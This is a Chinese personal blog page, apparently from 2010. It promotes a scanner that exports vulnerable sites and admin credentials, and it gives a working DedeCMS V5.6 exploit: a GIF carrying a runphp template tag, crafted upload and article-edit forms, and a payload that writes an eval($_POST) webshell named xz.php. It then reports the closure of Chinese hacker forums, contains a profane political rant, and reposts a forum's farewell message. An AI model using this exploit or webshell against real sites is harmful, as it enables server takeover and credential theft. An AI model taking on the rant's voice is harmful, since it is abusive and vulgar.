欢迎来到小猪的Blog

上图

08-23更新

应要求增加导出按钮 可以导出所有存在漏洞的地址以及管理员账号密码

下载地址：

本地下载

应MARS要求做的 新增了CDN检测 支持自定义C段批量反查

废话不多说 上图


下载地址：
本地下载

这0day其实已经很久了 不过一直都没人发布 今天看到有人已经发了
于是看了几篇文章 把利用方法写一下

Gif89a{dede:field name=’toby57′ runphp=’yes’}
phpinfo();
{/dede:field}
保存为1.gif

<form action=”http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php” method=”post” enctype=”multipart/form-data” “>
<input type=”hidden” name=”aid” value=”7” />
<input type=”hidden” name=”mediatype” value=”1″ />
<input type=”text” name=”oldurl” value=”/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif” /></br>
<input type=”hidden” name=”dopost” value=”save” />
<input name=”title” type=”hidden” id=”title” value=”1.jpg”/>
<input name=”addonfile” type=”file” id=”addonfile”/>
<button type=”submit” >更改</button>
</form>
构造如上表单，上传后图片保存为/uploads/userup/3/1.gif

发表文章，然后构造修改表单如下：
<form  action=”http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php” method=”post” enctype=”multipart/form-data”>
<input type=”hidden” name=”dopost” value=”save” />
<input type=”hidden” name=”aid” value=”2” />
<input type=”hidden” name=”idhash” value=”ec66030e619328a6c5115b55483e8dbd” />
<input type=”hidden” name=”channelid” value=”1″ />
<input type=”hidden” name=”oldlitpic” value=”" />
<input type=”hidden” name=”sortrank” value=”1282049150″ />   
<input  name=”title” type=”text” id=”title” value=”aaaaaaaaaaaaaaa” maxlength=”100″/>
<input type=”text” name=”writer” id=”writer” value=”123456″ maxlength=”100″ style=”width:219px”/>
<select name=’typeid’ size=’1′>
<option value=’1′ class=’option3′ selected=”>Test</option>
<select name=’mtypesid’ size=’1′>
<option value=’0′ selected>请选择分类…</option>
<option value=’1′ class=’option3′ selected>aa</option></select>
<textarea name=”description” id=”description”>aaaaaaaaaaaaa</textarea>
<input type=’hidden’ name=’dede_addonfields’ value=”templet”>
<input type=’hidden’ name=’templet’ value=”../uploads/userup/3/1.gif“>
<input type=”hidden” id=”body” name=”body” value=”aaaa” style=”display:none” />
<button type=”submit”>提交</button>
</form>

提交后查看文章就行 看到phpinfo就说明成功了

如果要getshell只需要修改下1.gif的内容
Gif89a{dede:name runphp='yes'}
$fp = @fopen("xz.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[xz])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
改成这样上传 然后按照前面的方法到最后查看文章 就能在plus目录生成xz.php一句话 密码xz

时间关系没有去做测试 不过很多人都测试成功了 能看懂的就看 看不懂的直接忽略就行 别找我来帮忙

截止8月15号，国内黑客技术论坛站长，大量被抓，导致新闻屡屡不段，围观群众越来越多,

黑客基地（整改）、华夏黑客同盟（整改，取消黑客动画、黑客软件等栏目）、黑客动画吧（整改，目前网站无法访问，尚不知具体情况）、黑鹰安全网（关闭）、华夏黑客联盟（整改）、黑色旋风（关闭）、黑客风云（关闭）、华西安全网（关闭）、网络安全网（关闭）、黑客软件园（关闭）、学生黑客联盟（关闭）黑色旋风站长被抓，拘留三天…

3EST被GFW 目前只能通过国外VPN访问

今天是哀悼日 替舟曲死难同胞哀悼的同时 也悼念下国内已被和谐和正在被和谐的技术网站

也只能在国外的域名国外的空间说说话了。。。操你妈的G.O.V。。放着那么多乱七八糟的事不管来管起这个来了 有本事你他妈多杀几个贪官去 有本事你他妈管管你的那些“人民公仆”去 和谐社会和谐你妈逼 迟早把你们G.C.D给和谐了 水能载舟亦能覆舟 老祖宗的道理不是苹果砸出来的 老天是公平的 你现在牛逼迟早有一天得傻逼 哥可能看不到 但是哥会让儿孙们记住一句诗 王师北定中原日，家祭无忘告乃翁！

一岁不到的刀客城（运行217天）由于某些原因将在于2010-08-16凌晨暂时关闭
以下为金刀客原文

很遗憾，经过和多个朋友的沟通和了解，今天决定关闭刀客城。
    
     首先我很感谢大家在近半年的时间里对刀城的支持和厚爱。各位刀友从五湖四海汇集到刀城这个小小的城堡，一起学习，一起交流。在慢慢的人生长河中，在浩瀚的网络世界中相遇并相知，这是一种缘分。我很珍惜这段时光，也很快乐，在这段时间里结识了你们，你们是如此的乐于奉献，如此乐于助人，如此的可爱。每次到知道区游览看到很多刀友热心助人，从不隐瞒自己掌握的知识，尽力解答楼主提出的各种各样的问题。有一个刀友给我说他和另外一个朋友专门盯着知道区，只要有求助帖就马上去解答，有时候一个问题他们几个人竟然花几天的时间去研究，然后回复给出答案，这真的令我很感动。我在知道区订立必须感谢结贴的规矩，因为这是对于助人者的唯一回报。常怀感谢之心，这样必将会有更多的朋友帮你！我想这在现实生活中也是适用的法则。在刀城，最让我开心的事情莫过于有朋友给我说在刀城学到了东西，这让人非常的欣慰。
  
     遗憾的是我必须关闭刀城了，请各位多多谅解。建立论坛之初我是觉得论坛交流比博客更方便，所以从来就没有牟利的想法。我只是想几个有兴趣的朋友一起交流心得和体会，这样可以互相学习的更多。我是做安全维护的，从安全的角度来讲，如果对攻击一无所知，我想安全也是做不好的，这是刀城讨论的所有内容的基石。前段时间有几个朋友给我说最近发生的一些事情，我都没有在意，也一直没有关心，因为从来没有做过违法乱纪的事情，不做亏心事，不怕鬼敲门。今天晚上一上刀城又看到几个朋友讨论刀城的命运的事情，我想事情是不是有点严重了？于是和几个朋友进行了沟通。小米说只要是提供黑客工具的网站从定义上来说都是违法的。我必须得慎重考虑这些问题，不能让爱好影响到实际生活。于是做出了关闭刀城的决定。会给大家一个下载的时间，取消积分限制，0点停止刀城论坛的解析！

    对不住了，各位兄弟，请多多理解！以后博客，qq，邮箱都可以交流的。小米说以后给一个地方放刀城，那就以后再说吧。

    衷心祝愿各位刀城的朋友学习进步，生活如意！

by daokers 8.15日夜

转自 刀客城 原文链接 http://forum.daokers.com/read.php?tid=3698 估计0点之后就失效了

2010-08-16 00:00的刀客城 最后的纪念

自己的ID